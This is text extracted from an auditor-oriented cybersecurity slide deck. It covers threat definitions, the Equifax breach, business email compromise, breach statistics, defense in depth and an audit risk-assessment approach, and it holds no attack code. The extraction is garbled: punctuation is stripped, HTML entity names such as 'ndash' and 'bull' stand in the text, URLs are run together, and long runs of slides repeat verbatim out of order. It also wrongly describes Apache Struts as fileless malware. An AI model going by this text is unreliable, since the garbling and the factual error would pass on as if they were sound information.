Internet of Things ndash A computing concept that describes the idea of everyday physical devices (DVR systems thermostats refrigerators vehicles) being connected to the internet and being able to identify themselves to other devices which enable the devices to collect and exchange data
12
13
ATTACKS IN THE HEADLINES
httpswwwbusinessinsidercomhackers-stole-a-casinos-database-through-a-thermometer-in-the-lobby-fish-tank-2018-4
httpsjsiswashingtonedunewscyberattack-critical-infrastructure-russia-ukrainian-power-grid-attacks
14
COMMON TERMS AND DEFINITIONSBot ndash A bot is a software ldquorobotrdquo that performs an extensive set of automated tasks on its own Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network They can also be used by black hats to coordinate attacks by controlling botnets
Botnet ndash A number of Internet-connected devices (eg computers DVR systems and other devices) after being infected with malware each of which is running one or more bots Botnets can be used to perform Distributed Denial Of Service Attack steal data send spam and allow the attacker access to the device and its connection Botnets can be rented out to other hackers or cyber criminals
Denial of Service(DOS) and Distributed Denial of Service ndash A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic A Distributed DOS is the same as a DOS attack but involves multiple computers attacking the network from multiple locations Typically the computers being used are infected with Botnet
15
ATTACKS IN THE HEADLINES
httpswwwcsoonlinecomarticle3258748the-mirai-botnet-explained-how-teen-scammers-and-cctv-cameras-almost-brought-down-the-internethtml
httpswwwwiredcomstoryreaper-iot-botnet-infected-million-networks
16
COMMON TERMS AND DEFINITIONSMiddleware ndash Software that facilitates exchange of data between two application programs within the same environment or across different hardware and network environments Three basic types of middleware are (1) communication middleware (2) database middleware and (3) system middleware
Man-in-the-Middle (MITM) Attacks ndash An attack occurrence where the attacker has been able to place themselves in the middle of communications between two parties The Attacker is able to alter or obtain data for themselves while unknown to the other two parties
SQL Injection and Cross-site scripting Attacks ndash An attack occurrence where the attacker injects malicious code into a website In SQL Injection the attacker uses SQL language to obtain information back from the website that was unintended In Cross-site scripting the attacker injects code that only impacts other users of website
17
ATTACKS IN THE HEADLINES
httpswwwzdnetcomarticleman-in-the-middle-flaw-left-smartphone-banking-apps-vulnerable
httpskrebsonsecuritycom201809secret-service-warns-of-surge-in-atm-wiretapping-attackscomment-page-1httpswwwscmagazinecomhomesecurity-newscisco-patches-prime-license-
manager-sql-injection-vulnerability
httpswwwtechrepubliccomarticlebritish-airways-data-theft-demonstrates-need-for-cross-site-scripting-restrictions
18
COMMON TERMS AND DEFINITIONSCommon Vulnerability and Exposures (CVE) ndash Catalog sponsored by Homeland Security that documents known Cyber threats Vulnerabilities are known errors in a system or software that provides an attacker with direct access Exposures are known errors that allow an attacked indirect access which may allow the attacker to gather knowledge or content Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level
Zero Day VulnerabilityAttack ndash An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by vendor
Advanced Persistent Threat ndash A set of stealthy and continuous computer hacking processes often orchestrated by a person or persons targeting a specific entity
19
Malware is short for malicious software Malware is a broad term that encompasses computer viruses worms Trojan horses spyware adware and Ransomware Malware is designed to interfere with normal computer operation usually giving hackers a chance to gain access to your computer and collect sensitive personal information
MALWARE
bull Malware is seen as first access point used in connection with Hacking attempts
bull Ransomware is a version of Malware that has been in the headlines
bull Malware can grant command and control of a device to the hackers
bull 1 in 131 emails contained Malware in 2016
bull ldquoFilelessrdquo Malware is a new variant that is more difficult to detect
20
bull Attack started early March 2017 with hackers using a Bot programmed to search the web for a recently
released CVE (Common Vulnerability and Exposure)
bull Took the hackers two months before they found the vulnerability on one of Equifaxrsquos websites used to help
customers with claims
COMPLEXITY BEHIND THE EQUIFAX ATTACK
bull Hackers then used another vulnerability (a Fileless Malware
named Apache Struts) that was also a CVE that had been
issued a month before but never fixed
bull Hackers spent an estimated 76 days in the network and
downloaded records from 51 different databases
bull Over 148 million records were stolen
bull Attack was not identified until July 30 2017
21
In addition to US consumers the UK Data Protection Authority the Information Commissionerrsquos Office reported
bull Approximately 20000 UK data subjects had names dates of birth telephone numbers and driving license numbers exposed
bull More than 600000 UK data subjects had names dates of birth and telephone numbers exposed
bull Up to 15 million UK data subjects had names and dates of birth exposed
EQUIFAX ndash WHAT WAS LOST
22
COMMON TERMS AND DEFINITIONSDark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or means Darknet sites require special software such as TOR (The Onion Router) that helps keep users anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or Credit card data as well as Botnet rentals Bitcoins are traded on the Dark Web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash that is the amount of computing power involved ndash increases
23
RANSOMWAREA type of malware that prevents or limits users from accessing their system either by locking the systems screen or by locking the users files unless a ransom is paid Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decrypt key
bull The Use of BITCOINS is typically the payment method
bull Ransomware attacks were growing at a rate of 350 annually until 2017 and have now dropped but still present (HR and Healthcare companies both in February)
bull WannaCry Ransomware attack impacted over 200000 people across 150 countries (included a Worm)
24
RANSOMWARERansomware-As-A-Service allows any amateur attacker to get into the business with basic knowledge and less effort The Amateur attacker can visit a RAAS site on the dark web and set up an account to create the Ransomware package It is up to the attacker to distribute the ransomware while the RaaS will handle the ransom payments The RaaS developer takes a cut of any payments that are made The developer will also reduce their cut depending on the volume of payments received
25
bull Business Email Compromise (BEC) is an exploit targeting a companyrsquos corporate email accounts and impersonating or ldquospoofingrdquo the email identity of an employee or company executive in order to fraudulently obtain moneys or sensitive information from the company its business partners andor employees
bull The FBIs Internet Crime Complaint Center or IC3 said that based on fraud reports submitted from October 2013 to May 2018 there were 41058 total US victims of BEC schemes which collectively lost at least $29 billion while global losses were more than four times that amount (FBI Global Business Email Compromise Losses Hit $125 Billion)
bull BEC exploits have become so concerning that the SEC issued a Report of Investigation in October 2018 (httpswwwsecgovlitigationinvestreport34-84429pdf) The report was considered a ldquohighly unusual actionrdquo by the SEC and identified nine companies that had been specifically investigated by the SEC due to a BEC incident
bull All nine lost at least $1 Million due to BEC scam
bull Two companies lost more then $30 Million each
bull In total the nine issuers lost almost $100 Million
BUSINESS EMAIL COMPROMISE (BEC)
26
A form of social engineering in which a message typically an email with a malicious attachment or link is sent to a victim with the intent of tricking the recipient to open an attachment
BEC amp PHISHING
Spear PhishingPhishing attacks directed at a specific individual or company Sub-category of Spear phishing includes Cloning (using a previous legitimate email) and Whaling (attacking a high-level executive)
bull CEO Email to Treasurerbull HR Phishing for Employee Databull W2 Phishing Data (IRS sent out warning)
The majority of Phishing cases are used as a means to install Malware onto a host environment
27
Most companies battle the increased Phishing and Spear-phishing attacks by labeling each external email with some form of the following inserts
PHISHING EMAIL EXAMPLE
This ldquoband-aidrdquo is still widely in practice today however
28
bull Office 365 is Microsoftrsquos Cloud-based solution offering everything from email and Excel to cloud storage
bull Microsoft Office 365 is now in use at over 70 of Fortune 500 Companies
bull 20 of all companies use Office 365
bull Office 365 overtook Office products in 4th quarter 2017 as the largest revenue stream for Microsoft
BEC amp OFFICE 365
bull Most companies do not correctly set up Office 365
Security or Logging
bull Significant increase in attack vectors against Office
365
bull Only takes one employee and the hacker is internal to
email and Office 365
bull Some attack vectors do not require Phishing email
29
BEC ATTACK WALKTHROUGH
30
BEC ndash PROTECT YOUR CASHAccounting controls at all entryexit points for cash
Cash Receiptsbull Review of balances over 60 days and $10k ndash triggered review and
communication uncovered change in bank info (communication was being sent to deleted email)
bull Reports that generate overdue receivables timely for follow-upbull Elevation rules for overdue receivables
Cash Disbursementbull SOD ndash limit access to vendor master filebull Controls related to changing bank info for all vendors ndash need
more than email communication personal verification with vendor requesting change
bull Vendor set-up ndash verification of information providedbull ISNetworld ndash vetting process for vendors could require vetting
prior to set up as vendorsbull ACH debits ndash no reason to give debit access to account if done
dual approval and ZBA should be usedbull Multi-factor authentication
Treasury Cyber Insurance
Payroll Legal Liabilities
Royalties Contract Language
SOX Impact
Other Processes to Consider
31
AND MULTI-FACTOR AUTHENTICATIONbull Google has not had any of its 85000+ employees successfully phished on their work-related accounts since early 2017
when it began requiring all employees to use physical Security Keys in place of passwords and one-time codes
bull Office 365 and other cloud-based services should all use multi-factor Authentication
32
Many companies do not know where to start with cybersecurity how to evaluate what is enough or how to recover when their best efforts still result in a cyber breach
Main reasons for companies struggles are
BARRIERS TO EFFECTIVE CYBERSECURITY
bull Lack of skilled resources (people and time)
bull Lack of funds
bull Continued innovations in Technology
bull Expansion of the Attack Surface
bull Lack of understanding of companyrsquos information assets and value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
33
Defense-in-Depth approach to Cybersecurity is a layered approach to cybersecurity that recognizes a companyrsquos first line of defense may fail and integrates multiple layers of defense around a companyrsquos information assets Also called the Castle Approach (once you breach the walls more defenses are in place)
DEFENSE IN-DEPTH APPROACH
Patch Management Operating System EOL
Network Vulnerability Scanning Security Staffing
Internal amp External Network Boundaries Wireless Security
Firewall Implementation and Monitoring (including NextGen) IPS IDS SIEM Implementations
Firewall Dataflow amp Standards Documentation Cloud Service Provider Evaluations
Security Incident Management Physical Security
Evaluation of Encryption Technologies Network Access Control
Workstation Endpoint Protection
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
35
Step 1 - Identify risks through formal risk assessment of assets
Step 2 - Perform baseline gap analysis of the current control environment to industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents effecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
WHERE AUDIT CAN HELP
Risk Assessments
Create a BaselineGap
Analysis
Implement and Manage
Controls
Assess amp Report
36
bull Perform risk assessments to understand the organizational risk and where high-risk assets exist
bull Risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
bull Work with IT to classify each of the asset types to assist in measuring overall risk of a cybersecurity event
bull Consider using a Threat Modeling tool to semi-qualitatively measure cybersecurity risks to identify estimate and prioritize information security risks
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
Key to an effective cybersecurity program is to understand the Companyrsquos information assets
STEP 1 - CYBERSECURITY RISK ASSESSMENT
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Data Locationbull Cash In Cash Out Processesbull Who Would Want the Data
37
38
bull Through formal risk assessments with all critical functions in the business identify where data lives and how the data should be classified then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
bull Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Example screenshot of a critical data asset risk assessment
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
STEP 2 - BASELINE GAP ANALYSIS
39
40
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
bull Use the cybersecurity maturity baseline and risk assessment results to identify and prioritize controls to implement including the highest priority most impactful controls that should be implemented first
STEP 2 - BASELINE GAP ANALYSIS
41
bull The Baseline Gap Analysis facilitates the Identification of controls which will most reduce the risk of cybersecurity threats to the greatest number of critical data assets (as identified during the risk assessment)
bull Work with IT Management to identify realistic and feasible mitigating controls and an implementation roadmap
1
79
25 2523
8
18
6
12
16
6
16
3
25 25
7
1514
MITIGATING CONTROL COUNTS
A) Identify Info Systems with calc cybersecurity risk gt 100
B) Does Info system have the SPECIFIC THREAT cybersecurity risk over 100 (Yes No) If yes move to next step
C) Identified mitigating controls to implement to mitigate threat
D) Totaled all instances where controls reduced risk
STEP 3 - CONTROLS ANALYSIS
42
bull Leverage information gained during the project to provide management with a detailed mapping of the organizations cybersecurity position
bull Consider using the COBIT Process Capability Model to map out the CSC framework which will allow management to begin tracking cybersecurity maturity
5 = OPTIMIZED
4 = PREDICTABLE
3 = ESTABLISHED
2 = MANAGED
1 = PERFORMED
STEP 4 - CYBERSECURITY REPORTING
CYBERSECURITY FRAMEWORKS AND GUIDANCE
NIST
bull NIST SP 800-53 r5 Recommended Security Controls for Federal Information Systems and Organizations
bull NIST Cyber Security Framework v 11
bull Various other NIST special publications
Center for Internet Security
bull Critical Security Controls (formerly SAN Top 20)
International Organization for Standardization
bull ISO ndash 27001 family ndash Information security management systems
ISACA
bull Implementing the NIST Cybersecurity Framework Using COBIT 5
Does company size matterCompanies with more than 10000 employees are slightly more likely to have adopted a security framework (90) but even smaller companies with fewer than 1000 employees report significant rates of adoption (77) ndash Source itgovernanceusacom
According to Tenablersquos Trends in Security Framework Adoption Survey 84 of organizations in the US leverage a security framework in their organization and 44 use more than one framework - Source itgovernanceusacom
43
44
CENTER FOR INTERNET SECURITY ndash CRITICAL SECURITY CONTROLS
45
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
User and Administrator Level Access
bull Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied throughout IT systems Donrsquot just think SOX
bull Confirm IT is not using privileged accounts for daily tasks that can include browsing the internet or answering email
bull Determine whether privileged and admin account passwords are held at a higher standard than normal accounts (complexity length change frequency sharing)
bull Consider how IT monitors and is alerted on changes to elevated privileges
User Cybersecurity Training and Awareness
bull Companies often fail to implement basic end user training around cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the company
bull Determine whether your company conducts random phishing awareness training campaigns
bull Evaluate your companyrsquos overall cybersecurity training awareness program
46
CYBERSECURITY ndash WHAT INTERNAL AUDIT CAN DO
Vulnerability Management bull Most companies fail to implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable to adequately assess their patch management process
bull Ensure your IT departments are scanning all assets continuously to ensure newly discovered vulnerabilities are identified quickly
bull Validate the patch management process is effective in ensuring all IT devices are properly updated (patched) to reflect the latest software update or release from the vendor This includes workstations servers network equipment VMware Citrix non-Microsoft software etc
bull If known vulnerabilities cannot be patched due to business reasons determine whether those risks are formally accepted and tracked by management Assess whether there are sufficient mitigating controls in place
47
CYBERSECURITY ndash SUMMARY QUICK HIT LIST
REVIEW AT LEAST THE FOLLOWING FOR YOUR COMPANYbull Obtain a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devicersquos risk relating to patches
bull Understand your companyrsquos fundamental process around Patch Management and focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
bull Understand the coverage and terms of your companyrsquos cyber insurance policy
bull Assess the requirement for Multi-factor Authentication
48
ANATOMY OF AN ATTACK
49
QUESTIONS
David Losacco Principalmobile (918) 625-8870
davidlosaccostinnett-associatescom
Stinnett amp Associatesstinnett-associatescom
Dallas | Denver | Houston | Oklahoma City | San Antonio | Tulsa
5
WHAT DO ALL THESE COMPANIES HAVE IN COMMON
6
hellip AND THESE
7
List of Recent headlines
8
AS AUDITORS WHY DO WE CARE
Sources 2018 Global Megatrends in Cybersecurity
bull 51 of data breaches are caused by Organized Cyber Crime 18 are caused by Nation-States
bull 70 of cyber attacks and data breaches go undetected
bull 69 of organizations learn of their breach from an outside entity such as law enforcement customers or suppliers
bull In 2017 there were over 130 large-scale targeted breaches in the US per year and that number is growing by 27 percent per year
bull Small and mid-size businesses make up 43 of cyber crime targets
bull Cyber Crime costs estimated to reach $6 Trillion by 2021
bull 77 of organizations do not have a formal Cybersecurity Incident Response Plan
bull 147900000 consumer records impacted by Equifax breach in 2017 US Population is 327 Million
bull In 1st Quarter of 2017 60 of malware payloads were ransomware By the end of 2018 ransomwareaccounted for only 5 of malware
bull ldquoFilelessrdquo malware attacks increased 432 in 2017
bull Cyrptojacking attacks increased 8500 in 2017
Security compromises are a persistent business risk
9
THEY WANT OUR MONEY
Financial Gain is still the 1 factor for cyber attacks and breaches at over 75 in 2017 Espionage and other factors combined still make up less than 25
bull Personally Identifiable Information (PII) is worth more on the black market (ldquoThe Dark Webrdquo) than Credit Card Numbers
bull Ransomware payments estimated over $1 billion in 2017 70 of all Ransomware was paid
bull Email scams cost businesses over $12 Billion in 2018
bull 10 of laundered money is attributable to cyber crime That number is $200 Billion
Source Verizon Data Breach Investigations Report 2018
10
HOW DO THEY DO IT
Cyber criminals have multiple means to achieve Financial Gain
bull Theft of funds (Bank Accounts)
bull Extortion (Ransomware)
bull Selling of stolen credit cards
bull Selling of PII and PHI data
bull Insider Trading Information
bull Using compromised environment for other attacks or for rent (Cryptojacking)
11
EVERCHANGING LANDSCAPE
The types of cyber attacks and exploits are changing
bull Server Attacks once at 50 are trending down
bull User Device and Person attacks are both trending upward at nearly same pace due to Malware Ransomware and Phishing attacks
COMMON TERMS AND DEFINITIONSInformation Technology (IT) ndash The corporate department that handles the corporate software and hardware that runs the normal functions of a typical business or enterprise The department within a company that is charged with establishing monitoring and maintaining information technology systems and services
Operational Technology (OT) ndash The hardware and software that detects or causes a change through the direct monitoring andor control of physical devices processes and events in the enterprise OT technology and departments are usually found within manufacturing and industrial environments and include Industrial Control Systems (ICS) such as Supervisory Control and Data Acquisition systems (SCADA) OT devices and environments are typically run separately from IT departments These are the devices that communicate with pipelines and electrical grids (and nuclear power plants)
Internet of Things ndash A computing concept that describes the idea of everyday physical devices (DVR systems thermostats refrigerators vehicles) being connected to the internet and being able to identify themselves to other devices which enable the devices to collect and exchange data
12
13
ATTACKS IN THE HEADLINES
httpswwwbusinessinsidercomhackers-stole-a-casinos-database-through-a-thermometer-in-the-lobby-fish-tank-2018-4
httpsjsiswashingtonedunewscyberattack-critical-infrastructure-russia-ukrainian-power-grid-attacks
14
COMMON TERMS AND DEFINITIONSBot ndash A bot is a software ldquorobotrdquo that performs an extensive set of automated tasks on its own Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network They can also be used by black hats to coordinate attacks by controlling botnets
Botnet ndash A number of Internet-connected devices (eg computers DVR systems and other devices) after being infected with malware each of which is running one or more bots Botnets can be used to perform Distributed Denial Of Service Attack steal data send spam and allow the attacker access to the device and its connection Botnets can be rented out to other hackers or cyber criminals
Denial of Service(DOS) and Distributed Denial of Service ndash A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic A Distributed DOS is the same as a DOS attack but involves multiple computers attacking the network from multiple locations Typically the computers being used are infected with Botnet
15
ATTACKS IN THE HEADLINES
httpswwwcsoonlinecomarticle3258748the-mirai-botnet-explained-how-teen-scammers-and-cctv-cameras-almost-brought-down-the-internethtml
httpswwwwiredcomstoryreaper-iot-botnet-infected-million-networks
16
COMMON TERMS AND DEFINITIONSMiddleware ndash Software that facilitates exchange of data between two application programs within the same environment or across different hardware and network environments Three basic types of middleware are (1) communication middleware (2) database middleware and (3) system middleware
Man-in-the-Middle (MITM) Attacks ndash An attack occurrence where the attacker has been able to place themselves in the middle of communications between two parties The Attacker is able to alter or obtain data for themselves while unknown to the other two parties
SQL Injection and Cross-site scripting Attacks ndash An attack occurrence where the attacker injects malicious code into a website In SQL Injection the attacker uses SQL language to obtain information back from the website that was unintended In Cross-site scripting the attacker injects code that only impacts other users of website
17
ATTACKS IN THE HEADLINES
httpswwwzdnetcomarticleman-in-the-middle-flaw-left-smartphone-banking-apps-vulnerable
httpskrebsonsecuritycom201809secret-service-warns-of-surge-in-atm-wiretapping-attackscomment-page-1httpswwwscmagazinecomhomesecurity-newscisco-patches-prime-license-
manager-sql-injection-vulnerability
httpswwwtechrepubliccomarticlebritish-airways-data-theft-demonstrates-need-for-cross-site-scripting-restrictions
18
COMMON TERMS AND DEFINITIONSCommon Vulnerability and Exposures (CVE) ndash Catalog sponsored by Homeland Security that documents known Cyber threats Vulnerabilities are known errors in a system or software that provides an attacker with direct access Exposures are known errors that allow an attacked indirect access which may allow the attacker to gather knowledge or content Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years but not fixed at the company level
Zero Day VulnerabilityAttack ndash An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by vendor
Advanced Persistent Threat ndash A set of stealthy and continuous computer hacking processes often orchestrated by a person or persons targeting a specific entity
19
Malware is short for malicious software Malware is a broad term that encompasses computer viruses worms Trojan horses spyware adware and Ransomware Malware is designed to interfere with normal computer operation usually giving hackers a chance to gain access to your computer and collect sensitive personal information
MALWARE
bull Malware is seen as first access point used in connection with Hacking attempts
bull Ransomware is a version of Malware that has been in the headlines
bull Malware can grant command and control of a device to the hackers
bull 1 in 131 emails contained Malware in 2016
bull ldquoFilelessrdquo Malware is a new variant that is more difficult to detect
20
bull Attack started early March 2017 with hackers using a Bot programmed to search the web for a recently
released CVE (Common Vulnerability and Exposure)
bull Took the hackers two months before they found the vulnerability on one of Equifaxrsquos websites used to help
customers with claims
COMPLEXITY BEHIND THE EQUIFAX ATTACK
bull Hackers then used another vulnerability (a Fileless Malware
named Apache Struts) that was also a CVE that had been
issued a month before but never fixed
bull Hackers spent an estimated 76 days in the network and
downloaded records from 51 different databases
bull Over 148 million records were stolen
bull Attack was not identified until July 30 2017
21
In addition to US consumers the UK Data Protection Authority the Information Commissionerrsquos Office reported
bull Approximately 20000 UK data subjects had names dates of birth telephone numbers and driving license numbers exposed
bull More than 600000 UK data subjects had names dates of birth and telephone numbers exposed
bull Up to 15 million UK data subjects had names and dates of birth exposed
EQUIFAX ndash WHAT WAS LOST
22
COMMON TERMS AND DEFINITIONSDark Web Darknet ndash Websites located on the internet that are not accessible by normal search engines or means Darknet sites require special software such as TOR (The Onion Router) that helps keep users anonymous Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or Credit card data as well as Botnet rentals Bitcoins are traded on the Dark Web
Bitcoin ndash A digital currency created in 2009 There are no physical bitcoins only balances kept on a public ledger in the cloud that ndash along with all Bitcoin transactions ndash is verified by a massive amount of computing power Bitcoin mining is the process through which bitcoins are released to come into circulation and involves solving a computationally difficult puzzle to discover a new block which is added to the blockchain and receiving a reward in the form of few bitcoins As more and more bitcoins are created the difficulty of the mining process ndash that is the amount of computing power involved ndash increases
23
RANSOMWAREA type of malware that prevents or limits users from accessing their system either by locking the systems screen or by locking the users files unless a ransom is paid Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decrypt key
bull The Use of BITCOINS is typically the payment method
bull Ransomware attacks were growing at a rate of 350 annually until 2017 and have now dropped but still present (HR and Healthcare companies both in February)
bull WannaCry Ransomware attack impacted over 200000 people across 150 countries (included a Worm)
24
RANSOMWARERansomware-As-A-Service allows any amateur attacker to get into the business with basic knowledge and less effort The Amateur attacker can visit a RAAS site on the dark web and set up an account to create the Ransomware package It is up to the attacker to distribute the ransomware while the RaaS will handle the ransom payments The RaaS developer takes a cut of any payments that are made The developer will also reduce their cut depending on the volume of payments received
25
bull Business Email Compromise (BEC) is an exploit targeting a companyrsquos corporate email accounts and impersonating or ldquospoofingrdquo the email identity of an employee or company executive in order to fraudulently obtain moneys or sensitive information from the company its business partners andor employees
bull The FBIs Internet Crime Complaint Center or IC3 said that based on fraud reports submitted from October 2013 to May 2018 there were 41058 total US victims of BEC schemes which collectively lost at least $29 billion while global losses were more than four times that amount (FBI Global Business Email Compromise Losses Hit $125 Billion)
bull BEC exploits have become so concerning that the SEC issued a Report of Investigation in October 2018 (httpswwwsecgovlitigationinvestreport34-84429pdf) The report was considered a ldquohighly unusual actionrdquo by the SEC and identified nine companies that had been specifically investigated by the SEC due to a BEC incident
bull All nine lost at least $1 Million due to BEC scam
bull Two companies lost more then $30 Million each
bull In total the nine issuers lost almost $100 Million
BUSINESS EMAIL COMPROMISE (BEC)
26
A form of social engineering in which a message typically an email with a malicious attachment or link is sent to a victim with the intent of tricking the recipient to open an attachment
BEC amp PHISHING
Spear PhishingPhishing attacks directed at a specific individual or company Sub-category of Spear phishing includes Cloning (using a previous legitimate email) and Whaling (attacking a high-level executive)
bull CEO Email to Treasurerbull HR Phishing for Employee Databull W2 Phishing Data (IRS sent out warning)
The majority of Phishing cases are used as a means to install Malware onto a host environment
27
Most companies battle the increased Phishing and Spear-phishing attacks by labeling each external email with some form of the following inserts
PHISHING EMAIL EXAMPLE
This ldquoband-aidrdquo is still widely in practice today however
28
bull Office 365 is Microsoftrsquos Cloud-based solution offering everything from email and Excel to cloud storage
bull Microsoft Office 365 is now in use at over 70 of Fortune 500 Companies
bull 20 of all companies use Office 365
bull Office 365 overtook Office products in 4th quarter 2017 as the largest revenue stream for Microsoft
BEC amp OFFICE 365
bull Most companies do not correctly set up Office 365
Security or Logging
bull Significant increase in attack vectors against Office
365
bull Only takes one employee and the hacker is internal to
email and Office 365
bull Some attack vectors do not require Phishing email
29
BEC ATTACK WALKTHROUGH
30
BEC ndash PROTECT YOUR CASHAccounting controls at all entryexit points for cash
Cash Receiptsbull Review of balances over 60 days and $10k ndash triggered review and
communication uncovered change in bank info (communication was being sent to deleted email)
bull Reports that generate overdue receivables timely for follow-upbull Elevation rules for overdue receivables
Cash Disbursementbull SOD ndash limit access to vendor master filebull Controls related to changing bank info for all vendors ndash need
more than email communication personal verification with vendor requesting change
bull Vendor set-up ndash verification of information providedbull ISNetworld ndash vetting process for vendors could require vetting
prior to set up as vendorsbull ACH debits ndash no reason to give debit access to account if done
dual approval and ZBA should be usedbull Multi-factor authentication
Treasury Cyber Insurance
Payroll Legal Liabilities
Royalties Contract Language
SOX Impact
Other Processes to Consider
31
AND MULTI-FACTOR AUTHENTICATIONbull Google has not had any of its 85000+ employees successfully phished on their work-related accounts since early 2017
when it began requiring all employees to use physical Security Keys in place of passwords and one-time codes
bull Office 365 and other cloud-based services should all use multi-factor Authentication
32
Many companies do not know where to start with cybersecurity how to evaluate what is enough or how to recover when their best efforts still result in a cyber breach
Main reasons for companies struggles are
BARRIERS TO EFFECTIVE CYBERSECURITY
bull Lack of skilled resources (people and time)
bull Lack of funds
bull Continued innovations in Technology
bull Expansion of the Attack Surface
bull Lack of understanding of companyrsquos information assets and value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
33
Defense-in-Depth approach to Cybersecurity is a layered approach to cybersecurity that recognizes a companyrsquos first line of defense may fail and integrates multiple layers of defense around a companyrsquos information assets Also called the Castle Approach (once you breach the walls more defenses are in place)
DEFENSE IN-DEPTH APPROACH
Patch Management Operating System EOL
Network Vulnerability Scanning Security Staffing
Internal amp External Network Boundaries Wireless Security
Firewall Implementation and Monitoring (including NextGen) IPS IDS SIEM Implementations
Firewall Dataflow amp Standards Documentation Cloud Service Provider Evaluations
Security Incident Management Physical Security
Evaluation of Encryption Technologies Network Access Control
Workstation Endpoint Protection
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
35
Step 1 - Identify risks through formal risk assessment of assets
Step 2 - Perform baseline gap analysis of the current control environment to industry standard frameworks and identify controls which need to be implemented to reduce the risk of cybersecurity incidents effecting critical data assets
Step 3 - Make recommendations on implementation and ongoing management of cybersecurity controls
Step 4 - Follow-up reviews to monitor control implementation progress
Repeat
WHERE AUDIT CAN HELP
Risk Assessments
Create a BaselineGap
Analysis
Implement and Manage
Controls
Assess amp Report
36
bull Perform risk assessments to understand the organizational risk and where high-risk assets exist
bull Risk assessment should include interviews of departments outside of IT to ensure all critical data asset types are identified
bull Work with IT to classify each of the asset types to assist in measuring overall risk of a cybersecurity event
bull Consider using a Threat Modeling tool to semi-qualitatively measure cybersecurity risks to identify estimate and prioritize information security risks
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
Key to an effective cybersecurity program is to understand the Companyrsquos information assets
STEP 1 - CYBERSECURITY RISK ASSESSMENT
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Data Locationbull Cash In Cash Out Processesbull Who Would Want the Data
37
38
bull Through formal risk assessments with all critical functions in the business identify where data lives and how the data should be classified then perform a threat analysis to semi-qualitatively determine the risk of a particular cybersecurity incident occurring This allows you to determine the critical data assets in your environment that are at most risk of a cybersecurity incident
bull Use this data to evaluate and identify the cybersecurity framework controls to put in place for your business
STEP 1 - CYBERSECURITY RISK ASSESSMENT
Example screenshot of a critical data asset risk assessment
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
